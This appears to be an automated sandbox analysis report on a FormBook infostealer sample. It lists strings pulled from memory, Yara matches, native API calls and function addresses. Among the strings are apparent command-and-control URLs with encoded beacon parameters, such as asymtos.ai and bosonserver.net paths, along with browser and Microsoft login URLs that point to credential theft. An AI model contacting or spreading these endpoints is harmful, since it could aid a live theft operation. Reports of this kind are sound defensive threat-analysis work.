33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ

Source: fgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.accessoriestechbd.com
Source: fgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.accessoriestechbd.com/5pdf/
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dGHiTqj3AB.exe, 00000000.00000002.1757032878.0000000005630000.00000004.00000020.00020000.00000000.sdmp, dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mcbuilder.exe, 00000008.00000002.3493562644.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.000000000320A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETyga
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033F
Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mcbuilder.exe, 00000008.00000003.2580416916.0000000008245000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: mcbuilder.exe, 00000008.00000002.3493562644.00000000044A6000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.0000000002EE6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0042BEE3 NtClose,	3_2_0042BEE3
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942B60 NtClose,LdrInitializeThunk,	3_2_01942B60
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01942DF0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01942C70
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019435C0 NtCreateMutant,LdrInitializeThunk,	3_2_019435C0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01944340 NtSetContextThread,	3_2_01944340
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01944650 NtSuspendThread,	3_2_01944650
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942B80 NtQueryInformationFile,	3_2_01942B80
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942BA0 NtEnumerateValueKey,	3_2_01942BA0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942BF0 NtAllocateVirtualMemory,	3_2_01942BF0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942BE0 NtQueryValueKey,	3_2_01942BE0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942AB0 NtWaitForSingleObject,	3_2_01942AB0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942AD0 NtReadFile,	3_2_01942AD0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942AF0 NtWriteFile,	3_2_01942AF0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942DB0 NtEnumerateKey,	3_2_01942DB0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942DD0 NtDelayExecution,	3_2_01942DD0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942D10 NtMapViewOfSection,	3_2_01942D10
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942D00 NtSetInformationFile,	3_2_01942D00
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942D30 NtUnmapViewOfSection,	3_2_01942D30
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942CA0 NtQueryInformationToken,	3_2_01942CA0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942CC0 NtQueryVirtualMemory,	3_2_01942CC0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942CF0 NtOpenProcess,	3_2_01942CF0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942C00 NtQueryInformationProcess,	3_2_01942C00
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942C60 NtCreateKey,	3_2_01942C60
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942F90 NtProtectVirtualMemory,	3_2_01942F90
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942FB0 NtResumeThread,	3_2_01942FB0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942FA0 NtQuerySection,	3_2_01942FA0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942FE0 NtCreateFile,	3_2_01942FE0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942F30 NtCreateSection,	3_2_01942F30
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942F60 NtCreateProcessEx,	3_2_01942F60
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942E80 NtReadVirtualMemory,	3_2_01942E80
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942EA0 NtAdjustPrivilegesToken,	3_2_01942EA0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942EE0 NtQueueApcThread,	3_2_01942EE0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01942E30 NtWriteVirtualMemory,	3_2_01942E30
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01943090 NtSetValueKey,	3_2_01943090
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01943010 NtOpenDirectoryObject,	3_2_01943010
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019439B0 NtGetContextThread,	3_2_019439B0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01943D10 NtOpenProcessToken,	3_2_01943D10
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01943D70 NtOpenThread,	3_2_01943D70
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D4340 NtSetContextThread,LdrInitializeThunk,	8_2_038D4340
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D4650 NtSuspendThread,LdrInitializeThunk,	8_2_038D4650
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	8_2_038D2BA0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2BE0 NtQueryValueKey,LdrInitializeThunk,	8_2_038D2BE0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_038D2BF0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2B60 NtClose,LdrInitializeThunk,	8_2_038D2B60
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2AD0 NtReadFile,LdrInitializeThunk,	8_2_038D2AD0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2AF0 NtWriteFile,LdrInitializeThunk,	8_2_038D2AF0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2FB0 NtResumeThread,LdrInitializeThunk,	8_2_038D2FB0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2FE0 NtCreateFile,LdrInitializeThunk,	8_2_038D2FE0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2F30 NtCreateSection,LdrInitializeThunk,	8_2_038D2F30
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2E80 NtReadVirtualMemory,LdrInitializeThunk,	8_2_038D2E80
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2EE0 NtQueueApcThread,LdrInitializeThunk,	8_2_038D2EE0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2DD0 NtDelayExecution,LdrInitializeThunk,	8_2_038D2DD0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_038D2DF0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_038D2D10
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_038D2D30
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_038D2CA0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2C60 NtCreateKey,LdrInitializeThunk,	8_2_038D2C60
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_038D2C70
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D35C0 NtCreateMutant,LdrInitializeThunk,	8_2_038D35C0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D39B0 NtGetContextThread,LdrInitializeThunk,	8_2_038D39B0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2B80 NtQueryInformationFile,	8_2_038D2B80
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2AB0 NtWaitForSingleObject,	8_2_038D2AB0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2F90 NtProtectVirtualMemory,	8_2_038D2F90
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2FA0 NtQuerySection,	8_2_038D2FA0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2F60 NtCreateProcessEx,	8_2_038D2F60
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2EA0 NtAdjustPrivilegesToken,	8_2_038D2EA0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2E30 NtWriteVirtualMemory,	8_2_038D2E30
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2DB0 NtEnumerateKey,	8_2_038D2DB0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2D00 NtSetInformationFile,	8_2_038D2D00
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2CC0 NtQueryVirtualMemory,	8_2_038D2CC0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2CF0 NtOpenProcess,	8_2_038D2CF0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D2C00 NtQueryInformationProcess,	8_2_038D2C00
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D3090 NtSetValueKey,	8_2_038D3090
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D3010 NtOpenDirectoryObject,	8_2_038D3010
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D3D10 NtOpenProcessToken,	8_2_038D3D10
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D3D70 NtOpenThread,	8_2_038D3D70
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030B8BE0 NtDeleteFile,	8_2_030B8BE0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030B8AF0 NtReadFile,	8_2_030B8AF0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030B8980 NtCreateFile,	8_2_030B8980
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030B8DF0 NtAllocateVirtualMemory,	8_2_030B8DF0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030B8C80 NtClose,	8_2_030B8C80

Detected potential crypto function

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_0102D5BC	0_2_0102D5BC
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_05337170	0_2_05337170
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_05330006	0_2_05330006
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_05330040	0_2_05330040
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_05337163	0_2_05337163
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_0755F238	0_2_0755F238
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_07559588	0_2_07559588
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_07559150	0_2_07559150
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_0755B1C0	0_2_0755B1C0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_0755B1B1	0_2_0755B1B1
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_07550FD0	0_2_07550FD0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_07550FC0	0_2_07550FC0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_0755AD78	0_2_0755AD78
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 0_2_0755AD88	0_2_0755AD88
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00401420	3_2_00401420
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00401000	3_2_00401000
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00401154	3_2_00401154
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00401160	3_2_00401160
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00416A4E	3_2_00416A4E
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00416A53	3_2_00416A53
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0040FCCB	3_2_0040FCCB
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0040FCD3	3_2_0040FCD3
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0042E523	3_2_0042E523
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0040FEF3	3_2_0040FEF3
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0040DF73	3_2_0040DF73
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_00402FD0	3_2_00402FD0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019D01AA	3_2_019D01AA
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C41A2	3_2_019C41A2
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C81CC	3_2_019C81CC
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019AA118	3_2_019AA118
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01900100	3_2_01900100
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01998158	3_2_01998158
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019A2000	3_2_019A2000
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0191E3F0	3_2_0191E3F0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019D03E6	3_2_019D03E6
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CA352	3_2_019CA352
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019902C0	3_2_019902C0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019B0274	3_2_019B0274
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019D0591	3_2_019D0591
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01910535	3_2_01910535
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019BE4F6	3_2_019BE4F6
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019B4420	3_2_019B4420
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C2446	3_2_019C2446
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0190C7C0	3_2_0190C7C0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01934750	3_2_01934750
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01910770	3_2_01910770
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0192C6E0	3_2_0192C6E0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019129A0	3_2_019129A0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019DA9A6	3_2_019DA9A6
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01926962	3_2_01926962
